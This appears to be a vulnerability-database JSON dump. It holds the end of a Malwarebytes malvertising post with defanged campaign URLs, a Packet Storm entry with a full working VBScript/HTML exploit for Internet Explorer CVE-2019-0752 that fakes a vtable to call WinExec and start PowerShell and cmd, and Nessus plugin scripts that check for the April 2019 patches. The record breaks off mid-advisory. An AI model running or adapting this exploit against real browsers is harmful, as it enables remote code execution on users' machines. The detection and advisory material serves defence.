\ncanadaversaliska[.]info/coflexexo.php \ncanadaversaliska[.]info/coflexo.php \ncanadaversaliska[.]info/ukflexexo.php \ncanadaversaliska[.]info/ukflexo.php \ncanadaversaliska[.]info/usflexexo.php \ncanadaversaliska[.]info/usflexo.php \nkrostaur[.]com/jpexo.php \nkrostaur[.]com/jpflexexo.php \nkrostaur[.]com/jpflexo.php \nleiomity[.]com/ukexo.php \nleiomity[.]com/ukflexexo.php \nleiomity[.]com/usexo.php \nleiomity[.]com/usflexexo.php \nsurdised[.]com/coexo.php \nsurdised[.]com/usexo.php\n\n**Tweets referencing the malsmoke campaign**\n\nhttps://twitter[.]com/MBThreatIntel/status/1245791188281462784 https://twitter[.]com/FaLconIntel/status/1232475345023987713 https://twitter[.]com/nao_sec/status/1231149711517634560 https://twitter[.]com/tkanalyst/status/1229794466816389120 https://twitter[.]com/nao_sec/status/1209090544711815169\n\nThe post [Malvertising campaigns come back in full swing](<https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2020-09-09T17:07:14", "published": "2020-09-09T17:07:14", "id": "MALWAREBYTES:81EBDB0FC17CF31113F0A5563BE1B678", "href": "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", "type": "malwarebytes", "title": "Malvertising campaigns come back in full swing", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-05-29T03:40:03", "description": "", "published": "2019-05-24T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0752", "CVE-2019-0768"], "modified": "2019-05-24T00:00:00", "id": "PACKETSTORM:153078", "href": "https://packetstormsecurity.com/files/153078/Microsoft-Internet-Explorer-Windows-10-1809-17763.316-Memory-Corruption.html", "sourceData": "`<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 --> \n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) --> \n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 --> \n \n<!-- Tgroupcrew@gmail.com --> \n \n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get --> \n<!-- all the way to RCE using no shellcode. --> \n \n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. --> \n<!-- (h/t: James Forshaw, Google Project Zero) --> \n \n<html> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\"> \n<meta http-equiv=\"Expires\" content=\"-1\"> \n<body> \n<div id=\"container1\" style=\"overflow:scroll; width: 10px\"> \n<div id=\"content1\" style=\"width:5000000px\"> \nContent \n</div> \n</div> \n<script language=\"VBScript.Encode\"> \nDim ar1(&h3000000) \nDim ar2(1000) \nDim gremlin \naddressOfGremlin = &h28281000 \nClass MyClass \nPrivate mValue \nPublic Property Let Value(v) \nmValue = v \nEnd Property \nPublic Default Property Get P \nP = mValue ' Where to write \nEnd Property \nEnd Class \nSub TriggerWrite(where, val) \nDim v1 \nSet v1 = document.getElementById(\"container1\") \nv1.scrollLeft = val ' Write this value (Maximum: 0x001767dd) \nDim c \nSet c = new MyClass \nc.Value = where \nSet v1.scrollLeft = c \nEnd Sub \n' Our vulnerability does not immediately give us an unrestricted \n' write (though we could manufacture one). For our purposes, the \n' following is sufficient. It writes an arbitrary DWORD to an \n' arbitrary location, and sets the subsequent 3 bytes to zero. \nSub WriteInt32With3ByteZeroTrailer(addr, val) \nTriggerWrite addr , (val) AND &hff \nTriggerWrite addr + 1, (val\\&h100) AND &hff \nTriggerWrite addr + 2, (val\\&h10000) AND &hff \nTriggerWrite addr + 3, (val\\&h1000000) AND &hff \nEnd Sub \nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str) \nFor i = 0 To Len(str) - 1 \nTriggerWrite addr + i, Asc(Mid(str, i + 1, 1)) \nNext \nEnd Sub \nFunction ReadInt32(addr) \nWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr \nReadInt32 = ar1(gremlin) \nEnd Function \nFunction LeakAddressOfObject(obj) \nSet ar1(gremlin + 1) = obj \nLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18) \nEnd Function \nSub Exploit() \n' Corrupt vt of one array element (the \"gremlin\") \nTriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4 \nFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100 \nIf Not IsEmpty(ar1(i)) Then \ngremlin = i \nExit For \nEnd If \nNext \n \nIf IsEmpty(gremlin) Then \nMsgBox \"Could not find gremlin\" \nExit Sub \nEnd If \n \nFor i = 0 To UBound(ar2) \nSet ar2(i) = CreateObject(\"Scripting.Dictionary\") \nNext \n \nSet dict = ar2(UBound(ar2) / 2) \naddressOfDict = LeakAddressOfObject(dict) \nvtableOfDict = ReadInt32(addressOfDict) \nscrrun = vtableOfDict - &h11fc \nkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90 \nwinExec = kernel32 + &h5d380 \n \ndict.Exists \"dummy\" ' Make a dispatch call, just to populate pld \n' Relocate pld to ensure its address doesn't contain a null byte \npld = ReadInt32(addressOfDict + &h3c) \nfakePld = &h28281020 \nFor i = 0 To 3 - 1 \nWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i) \nNext \n \nfakeVtable = &h28282828 ' ASCII \"((((\" \nFor i = 0 To 21 \nIf i = 12 Then ' Dictionary.Exists \nfptr = winExec \nElse \nfptr = ReadInt32(vtableOfDict + 4 * i) \nEnd If \nWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr \nNext \n \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\" \nWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\" \n \nOn Error Resume Next \ndict.Exists \"dummy\" ' Wheeee!! \n \n' A little cleanup to help prevent crashes after the exploit \nFor i = 1 To 3 \nWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict \nWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2 \nNext \nErase Dict \nErase ar2 \nEnd Sub \nExploit \n</script> \n</body> \n</html> \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/153078/msiew10se-corrupt.txt"}], "nessus": [{"lastseen": "2021-01-01T05:45:41", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)", "edition": 16, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "Security Updates for Internet Explorer (April 2019)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0862", "CVE-2019-0752", "CVE-2019-0764", "CVE-2019-0753", "CVE-2019-0835"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_APR_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/123951", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123951);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/06/18 10:31:32\");\n\n script_cve_id(\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0835\",\n \"CVE-2019-0862\"\n );\n script_xref(name:\"MSKB\", value:\"4493446\");\n script_xref(name:\"MSKB\", value:\"4493471\");\n script_xref(name:\"MSKB\", value:\"4493472\");\n script_xref(name:\"MSKB\", value:\"4493451\");\n script_xref(name:\"MSKB\", value:\"4493435\");\n script_xref(name:\"MSFT\", value:\"MS19-4493446\");\n script_xref(name:\"MSFT\", value:\"MS19-4493471\");\n script_xref(name:\"MSFT\", value:\"MS19-4493472\");\n script_xref(name:\"MSFT\", value:\"MS19-4493451\");\n script_xref(name:\"MSFT\", value:\"MS19-4493435\");\n\n script_name(english:\"Security Updates for Internet Explorer (April 2019)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\");\n # https://support.microsoft.com/en-us/help/4493446/windows-8-1-update-kb4493446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60dedb61\");\n # https://support.microsoft.com/en-us/help/4493471/windows-server-2008-update-kb4493471\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78333a24\");\n # https://support.microsoft.com/en-us/help/4493472/windows-7-update-kb4493472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6116930e\");\n # https://support.microsoft.com/en-us/help/4493451/windows-server-2012-update-kb4493451\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b9c0466\");\n # https://support.microsoft.com/en-us/help/4493435/cumulative-security-update-for-internet-explorer-april-12-2019\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8128373\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4493446\n -KB4493471\n -KB4493472\n -KB4493451\n -KB4493435\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0752\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS19-04';\nkbs = make_list(\n '4493446',\n '4493435',\n '4493471',\n '4493472',\n '4493451'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19326\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4493435\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22722\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4493435\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19326\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4493435\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21327\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4493435\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4493435 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4493446 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-04', kb:'4493446', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4493451 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-04', kb:'4493451', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4493472 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-04', kb:'4493472', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB4493471 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS19-04', kb:'4493471', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:45:39", "description": "The remote Windows host is missing security update 4493448\nor cumulative update 4493472. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0791,\n CVE-2019-0792, CVE-2019-0793, CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493448: Windows 7 and Windows Server 2008 R2 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_APR_4493472.NASL", "href": "https://www.tenable.com/plugins/nessus/123945", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123945);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2020/01/22\");\n\n script_cve_id(\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493472\");\n script_xref(name:\"MSKB\", value:\"4493448\");\n script_xref(name:\"MSFT\", value:\"MS19-4493472\");\n script_xref(name:\"MSFT\", value:\"MS19-4493448\");\n\n script_name(english:\"KB4493448: Windows 7 and Windows Server 2008 R2 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493448\nor cumulative update 4493472. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0803, CVE-2019-0859)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0791,\n CVE-2019-0792, CVE-2019-0793, CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - A remote code execution vulnerability exists in the way\n 